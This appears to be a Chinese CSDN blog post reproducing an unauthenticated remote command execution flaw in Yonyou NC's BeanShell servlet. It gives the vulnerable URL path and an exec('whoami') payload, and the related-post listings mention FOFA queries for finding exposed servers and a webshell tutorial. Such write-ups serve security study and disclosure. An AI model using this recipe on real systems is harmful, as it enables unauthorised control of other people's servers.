用友bsh.servlet.BshServlet命令执行

最新推荐文章于 2023-01-09 11:54:38 发布
最新推荐文章于 2023-01-09 11:54:38 发布
阅读量5.1k 收藏 1
点赞数 1
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58434634/article/details/117547164
版权

image-20210603235008463

漏洞简介

nc存在一个未授权的页面,在无需登陆系统的情况下,攻击者可通过BeanShell测试接口直接执行任意命令,恶意攻击者成功利用该漏洞可获得目标系统管理权限。

漏洞复现

漏洞地址

http://xxx.xxx.xxx.xxx/servlet/~ic/bsh.servlet.BshServlet

在Script框输入要执行的命令,点击Evaluate即可

exec("whoami")

image-20210603232925112

漏洞检测

image-20210603234858919

在这里插入图片描述

安全小工坊
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
泛微OA漏洞学习——E-Cology BshServlet 远程代码执行漏洞 CNVD-2019-32204
记录并分享学习安全的知识点..
07-10 1649
2019年9月17日泛微OA官方更新了一个远程代码执行漏洞补丁,泛微e-cology OA系统的J**A Beanshell接口可被未授权访问,攻击者调用该Beanshell接口,可构造特定的HTTP请求绕过泛微本身一些安全限制从而达成远程命令执行,漏洞等级严重。......
【漏洞复现】用友NC-JNDI远程代码执行-registerServlet
最新发布
知黑而守白
07-15 118
用友NC Cloud大型企业数字化平台,深度应用新一代数字智能技术,完全基于云原生架构,打造开放、互联、融合、智能的一体化云平台,聚焦数智化管理、数智化经营、数智化商业等三大企业数智化转型战略方向,提供涵盖数字营销、财务共享、全球司库、智能制造、敏捷供应链、人才管理、智慧协同等18大解决方案,帮助大型企业全面落地数智化。用友-NC-Cloud ResourceManagerServlet 接口存在反序列化漏洞,使得攻击者可以通过构造特定的请求远程执行恶意代码。
用友 NC bsh.servlet.BshServlet 远程命令执行漏洞
Adminxe的博客
07-02 5385
0x00 漏洞描述 用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,通过BeanShell 执行远程命令获取服务器权限 看到这个beanshell,就会想起来一个洞,是泛微OA的beanshell 0x01 漏洞影响 用友 NC 0x02 FOFA “用友网络” 0x03 漏洞复现 漏洞位置 /servlet/~ic/bsh.servlet.BshServlet 将POC修改为: exec(“whoami”) 0x04 利用总..
用友 NC bsh.servlet.BshServlet RCE利用
huangyongkang666的博客
01-09 5710
用友 NC bsh.servlet.BshServlet 远程命令执行漏洞
用友NC bash.servlet.BshServlet 远程命令执行漏洞复现
panda的博客
09-16 1万+
用友NC bash.servlet.BshServlet 远程命令执行漏洞 漏洞成因: 用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,该漏洞为远程命令执行漏洞,在无需登陆系统的情况下,攻击者可通过BeanShell测试接口(BeanShell可以直接执行java代码,适用于测试java代码的接口)直接执行任意命令,恶意攻击者成功利用该漏洞可获得目标系统管理权限。 复现过程 一:寻找可测试页面 使用FOFA对使用用友NC的页面进行搜索,如图所示: 找到打开为用友NC的页面,
用友 NC bsh.servlet.BshServlet 远程命令执行漏洞 复现
shy的博客
06-10 4554
fofa搜索相关资产: icon_hash="1085941792" 访问首页如下: 漏洞Url为 /servlet/~ic/bsh.servlet.BshServlet 命令执行
用友NC BeanShell远程代码执行
09-07
用友 NC bsh.[servlet](https://so.csdn.net/so/search?q=servlet&spm=1001.2101.3001.7020).BshServlet 存在远程命令执行漏洞,通过BeanShell 执行远程命令获取服务器权限。 ## 漏洞影响 ``` NC 6.5版本 具体详见...
printvars.bsh
11-24
printvars.bshprintvars.bshprintvars.bshprintvars.bshprintvars.bshprintvars.bshprintvars.bshprintvars.bshprintvars.bshprintvars.bsh
bsh.rar_Beanshel_beanshell_bsh-2.0b4-src.zip_javascript 解释
09-19
它能执行标准的Java语句和表达式,还自带简单的脚本命令和语法。它把编程对象当成一个简单的方法,这很像Perl和JavaScript. 你可以在写Java测试或调试时使用BeanShell,也可以用它作为你的应用程序的脚本引挚。...
NC上传拿WEBSHELL教程
11-24
【标签】"webshell"是关键概念,它指的是黑客在目标系统上植入的一段恶意代码,通常是一小段PHP、ASP、JSP或其他服务器端脚本,可让攻击者通过HTTP协议执行任意命令,从而获得对服务器的后台控制权。Webshell的种类...
yx.bsh.me_PrintHand Mobile Print v13.0.0 [Premium].apk
01-26
printhand是一款简单实用的打印机软件,与一般的打印机工具不同这款打印机是在手机上使用的,适用于全部的安卓手机
【安全狐】用友 NC bsh.servlet.BshServlet 远程命令执行漏洞
安全狐
06-06 2466
用友 NC bsh.servlet.BshServlet 远程命令执行漏洞 0x01漏洞描述 用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,该漏洞为远程命令执行漏洞,在无需登陆系统的情况下,攻击者可通过BeanShell测试接口直接执行任意命令,恶意攻击者成功利用该漏洞可获得目标系统管理权限,系统如果直接暴露在互联网上风险较大。 0x02漏洞影响 用友 NC6.5版本 数据源于[安恒信息应急响应中心] 0x03漏洞复现 FOFA语句 icon_hash=“10859417
用友bshservlet_databasedecode漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-01 953
用友bshservlet_databasedecode漏洞成因: 用友bshservlet_databasedecode漏洞bash.servlet.BshServlet远程命令执行用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,该漏洞为远程命令执行漏洞,在无需登陆系统的情况下,攻击者可通过BeanShell测试接口(BeanShell可以直接执行java代码,适用于测试java代码的接口)直接执行任意命令,恶意攻击者成功利用该漏洞可获得目标系统管理权限。 用友bshser
java bsh 性能_Java动态执行代码Bsh
weixin_42097557的博客
02-13 778
首先要到http://www.beanshell.org/download.html去下载个BeanShell的一个包,如bsh-2.0b4.jar ,然后在ClassPath中将它的地址加上.package test;import java.util.Date;import bsh.EvalError;import bsh.Interpreter;public class Test {publi...
三个代码执行漏洞的复现
gh0stf1re的博客
04-04 5571
CNVD-2021-30167(用友NC BeanShell远程代码执行) CVE-2019-0193(Apache Solr Velocity模板注入RCE) CVE-2020-14882(Weblogic Console远程代码执行漏洞)
X友NC远程命令执行
weixin_51345872的博客
09-27 1941
仅供学习参考使用,任何违法事情与本人无关
用友OA漏洞复现手册
热门推荐
1stPeak's Blog
04-20 1万+
用友OA漏洞复现手册 前言:用友OA产品漏洞复现笔记,供自己使用,不定期更新
用友NC 漏洞汇总(转载)
xiaobai_20190815的博客
11-21 9139
用友NC 漏洞汇总
java bsh-2.0b4.jar 解析文件
12-05
java bsh-2.0b4.jar 是一个用于解析文件的工具。它是 BeanShell 的一个库文件,可以在 Java 程序中使用。 使用 bsh-2.0b4.jar 解析文件的过程是这样的: 首先,需要将 bsh-2.0b4.jar 文件添加到 Java 项目的依赖中。可以通过将该文件复制到项目的 lib 目录下,或者在构建工具(如 Maven、Gradle)的配置文件中添加依赖项。 然后,在 Java 代码中导入相应的类。 ```java import bsh.Interpreter; ``` 接下来,可以创建一个 Interpreter 对象,用于解析文件。 ```java Interpreter interpreter = new Interpreter(); ``` 可以使用 Interpreter 对象的 eval 方法来解析文件。eval 方法接受一个文件路径作为参数,将会执行该文件中的脚本代码。 ```java interpreter.source("path/to/your/file.bsh"); ``` 在文件中可以包含 BeanShell 语言的脚本代码,可以通过该脚本来执行各种操作,如定义变量、执行函数、调用外部类的方法等等。 通过以上步骤,就可以使用 bsh-2.0b4.jar 解析文件了。它可以帮助我们在 Java 程序中执行 BeanShell 脚本,灵活地扩展程序的功能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值